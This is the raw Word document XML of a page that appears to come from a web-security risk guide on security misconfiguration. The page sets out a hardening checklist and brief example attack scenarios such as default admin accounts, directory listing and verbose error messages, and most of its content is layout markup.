                      <w:p w14:paraId="13981356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rv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base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amework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ustom</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4C2A786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de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velop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</w:p>
                      <w:p w14:paraId="1459B6B3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dministrato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e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or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geth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50C2BC1B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nsu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nti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tac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figured</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="59B731CC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perly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oma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cann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ful</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="63FE3EB7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ss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tches,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2BB8E9FE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sconfiguration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fault</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6FF5843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necessar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rvice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tc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8DF4FF6" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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</w:p>
                      <w:p w14:paraId="6A0B5992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equen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ive</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="507821A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</w:p>
                      <w:p w14:paraId="2BAF3DC3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authoriz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</w:p>
                      <w:p w14:paraId="7CE1299E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</w:p>
                      <w:p w14:paraId="6506930C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48442EEA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ality.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7AC8B500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ccasionally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</w:p>
                      <w:p w14:paraId="00D4B3B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sul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7AFF50EA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le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</w:p>
                      <w:p w14:paraId="2FD00E4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romise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BBFB28C" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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</w:p>
                      <w:p w14:paraId="64318404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letely</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5AA28184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romised</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="274F8CA8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ithou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</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="31D3CB7E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now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25327F09" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="200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</w:p>
                      <w:p w14:paraId="1D404314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tol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dified</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="455A22B1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low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v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ime.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2DF1C4A2" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="31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cover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sts</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2F1136A5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ensive.</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="7EB9DAB0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60319C8B">
          <v:shape id="imagerId334" o:spid="_x0000_s2552" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:122pt;height:96pt;z-index:-251884032;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId334" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="6A4F663F">
          <v:shape id="imagerId335" o:spid="_x0000_s2551" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:83pt;width:76pt;height:37pt;z-index:-251883008;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId335" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0312725B">
          <v:shape id="imagerId336" o:spid="_x0000_s2550" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:101pt;margin-top:84pt;width:57pt;height:38pt;z-index:-251881984;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId336" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="75B9BD02">
          <v:shape id="imagerId337" o:spid="_x0000_s2549" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:222pt;margin-top:83pt;width:90pt;height:39pt;z-index:-251876864;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId337" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7194FF85">
          <v:shape id="imagerId338" o:spid="_x0000_s2548" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:224pt;margin-top:85pt;width:80pt;height:38pt;z-index:-251875840;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId338" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7C1B8394">
          <v:shape id="imagerId339" o:spid="_x0000_s2547" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:373pt;margin-top:81pt;width:64pt;height:43pt;z-index:-251880960;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId339" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4693C51E">
          <v:shape id="imagerId340" o:spid="_x0000_s2546" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:375pt;margin-top:87pt;width:59pt;height:38pt;z-index:-251879936;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId340" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2DFDEF95">
          <v:shape id="imagerId341" o:spid="_x0000_s2545" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:462pt;margin-top:83pt;width:69pt;height:39pt;z-index:-251878912;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId341" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="01DCFF40">
          <v:shape id="imagerId342" o:spid="_x0000_s2544" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:470pt;margin-top:84pt;width:54pt;height:38pt;z-index:-251877888;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId342" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="1638DEBE">
          <v:shapetype id="_x0000_m2543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EC5E41D">
          <v:shape id="_x0000_s2542" type="#_x0000_m2543" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25190144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8CCE2C9">
          <v:shapetype id="_x0000_m2541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724FFFA">
          <v:shape id="_x0000_s2540" type="#_x0000_m2541" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:124.5pt;width:543pt;height:3pt;z-index:25166387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417CF42F">
          <v:shapetype id="_x0000_m2539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B08B29">
          <v:shape id="_x0000_s2538" type="#_x0000_m2539" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:155.7pt;width:543pt;height:3pt;z-index:25166489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CD786CD">
          <v:shapetype id="_x0000_m2537" coordsize="600,2057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5B3753">
          <v:shape id="_x0000_s2536" type="#_x0000_m2537" style="position:absolute;left:0;text-align:left;margin-left:538.5pt;margin-top:71.65pt;width:6pt;height:205.7pt;z-index:25166592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2D661E41">
          <v:shapetype id="_x0000_m2535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1A378CF">
          <v:shape id="_x0000_s2534" type="#_x0000_m2535" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:73.15pt;width:543pt;height:3pt;z-index:25166694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75E64D5">
          <v:shapetype id="_x0000_m2533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B4F0BBB">
          <v:shape id="_x0000_s2532" type="#_x0000_m2533" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:272.9pt;width:543pt;height:3pt;z-index:25166796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6281E24B">
          <v:shapetype id="_x0000_m2531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BD33D86">
          <v:shape id="_x0000_s2530" type="#_x0000_m2531" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:7in;width:266.4pt;height:215pt;z-index:-25190041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61EC1532">
          <v:shapetype id="polygon154" o:spid="_x0000_m2529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8F5FF00">
          <v:shape id="_x0000_s2528" type="#polygon154" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:282pt;width:266.4pt;height:3in;z-index:-25189939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04462B0">
          <v:shapetype id="polygon155" o:spid="_x0000_m2527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A8AE2E9">
          <v:shape id="WS_polygon155" o:spid="_x0000_s2526" type="#polygon155" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251898368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6D2FF0D7">
          <v:shapetype id="polygon190" o:spid="_x0000_m2525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3374D08">
          <v:shape id="WS_polygon190" o:spid="_x0000_s2524" type="#polygon190" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-25189734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B931F85">
          <v:shapetype id="polygon200" o:spid="_x0000_m2523" coordsize="2223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62D1592">
          <v:shape id="WS_polygon200" o:spid="_x0000_s2522" type="#polygon200" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:558.2pt;width:222.35pt;height:.6pt;z-index:-25189632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AA15D39">
          <v:shapetype id="_x0000_m2521" coordsize="2232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B825616">
          <v:shape id="_x0000_s2520" type="#_x0000_m2521" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:574.2pt;width:223.2pt;height:.55pt;z-index:-2518952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22D3F90">
          <v:shapetype id="polygon210" o:spid="_x0000_m2519" coordsize="2059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CEC72A5">
          <v:shape id="WS_polygon210" o:spid="_x0000_s2518" type="#polygon210" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:590.15pt;width:205.9pt;height:.6pt;z-index:-2518942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5F6FD2F">
          <v:shapetype id="_x0000_m2517" coordsize="22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F5BB45E">
          <v:shape id="_x0000_s2516" type="#_x0000_m2517" style="position:absolute;left:0;text-align:left;margin-left:284.25pt;margin-top:606.2pt;width:2.25pt;height:.6pt;z-index:-251893248;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" fillcolor="#323232" stroked="f">
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4C2327C8">
          <v:shapetype id="_x0000_m2515" coordsize="1868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B9EEE2">
          <v:shape id="_x0000_s2514" type="#_x0000_m2515" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:606.2pt;width:186.8pt;height:.6pt;z-index:-2518922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70E3C07">
          <v:shapetype id="_x0000_m2513" coordsize="2404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821AFFB">
          <v:shape id="_x0000_s2512" type="#_x0000_m2513" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:622.2pt;width:240.45pt;height:.55pt;z-index:-2518912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F692F69">
          <v:shapetype id="_x0000_m2511" coordsize="2062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4CB952">
          <v:shape id="_x0000_s2510" type="#_x0000_m2511" style="position:absolute;left:0;text-align:left;margin-left:280.8pt;margin-top:648.2pt;width:206.25pt;height:.6pt;z-index:-2518901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76E4119">
          <v:shapetype id="polygon238" o:spid="_x0000_m2509" coordsize="1875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C452C6">
          <v:shape id="WS_polygon238" o:spid="_x0000_s2508" type="#polygon238" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:680.15pt;width:187.55pt;height:.6pt;z-index:-25188915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5A81E9F">
          <v:shapetype id="polygon243" o:spid="_x0000_m2507" coordsize="1845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AB5F14">
          <v:shape id="WS_polygon243" o:spid="_x0000_s2506" type="#polygon243" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:696.2pt;width:184.55pt;height:.6pt;z-index:-25188812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26B4746">
          <v:shapetype id="polygon248" o:spid="_x0000_m2505" coordsize="1888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89A2D6E">
          <v:shape id="WS_polygon248" o:spid="_x0000_s2504" type="#polygon248" style="position:absolute;left:0;text-align:left;margin-left:286.55pt;margin-top:712.2pt;width:188.85pt;height:.55pt;z-index:-25188710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DCDCF78">
          <v:shapetype id="polygon249" o:spid="_x0000_m2503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B9D07D5">
          <v:shape id="WS_polygon249" o:spid="_x0000_s2502" type="#polygon249" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:282pt;width:266.4pt;height:3in;z-index:-25188608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02425D09">
          <v:shapetype id="_x0000_m2501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6F7D00D">
          <v:shape id="_x0000_s2500" type="#_x0000_m2501" style="position:absolute;left:0;text-align:left;margin-left:272.6pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-251885056;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" strokecolor="#b3d6ac" strokeweight="2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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CF0F9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F522B3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Security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Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41073D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1FBFBAAE" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19696115" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ABE1B1F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2372D0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF88DD2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16659F96" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53A7FF5A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFC12EF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576F4299" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625AD773" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520837E2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2054C287" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB77E52" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1076025C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A452C8F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ACB3912" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1159608D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD9C230" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38FB716C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213B08BD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="374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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CAFF97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is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p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cur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rdening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BC4841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cro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ack?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cluding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702CBDF3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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>   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ftw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e?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clud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S,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F801965" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Web/Ap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BM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code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705B3D49" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>libraries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(see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new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A9)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774B14A0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2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> 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necessar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eatur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abl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stall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(e.g.,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166328C0" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>port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ic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vileges)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751F1381" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="26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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> 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faul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i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sswor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i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abled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443C4030" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="317"/>
      </w:pP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changed?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567742E2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4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Do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rr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ndl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vea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a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ac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ther</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384DC2F3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>over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formati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rr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essag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s?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3CBEDE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5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t> 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cur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tting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velopm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rameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27731547" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="199" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>(e.g.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rut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pring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P.NET)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brar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05041B57" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="202" w:lineRule="exact"/>
        <w:ind w:left="144" w:firstLine="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="323232"/>
          <w:w w:val="98"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>secu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alues?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09998438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With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certed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peat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curity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617200E1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nfigur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ces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ystem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ig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isk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D989BD7" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="472" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="129F7AB9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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33C92D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="251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1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dm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so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ically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB97F24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stall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moved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faul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n’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anged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F5FF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scov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anda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dm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</w:p>
    <w:p w14:paraId="2721896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erver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og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faul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ssword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k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ver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA12C3A" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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2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or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st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sabl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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2A97EB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scov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mp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or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</w:p>
    <w:p w14:paraId="2312ECF6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il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wnloa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il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Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281963FF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lass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i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compil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ver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gine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ge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</w:p>
    <w:p w14:paraId="711E042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usto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d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iou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trol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27932AAF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la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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D94A9F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="301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3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figur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ow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a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ac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5210A7CD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="201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turn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otenti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po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derly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ws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64024ED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ttack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o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tr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form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rr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essag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vide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47979979" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="300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4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amp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</w:p>
    <w:p w14:paraId="1DE78B1B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mov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ro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du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ai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ample</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D03D9C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pplication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e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know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cur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w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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD8695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romi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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424EA02D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5D63A933" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535EF4F9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE8E06D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF6ABFD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="144"/>
      </w:pPr>
    </w:p>
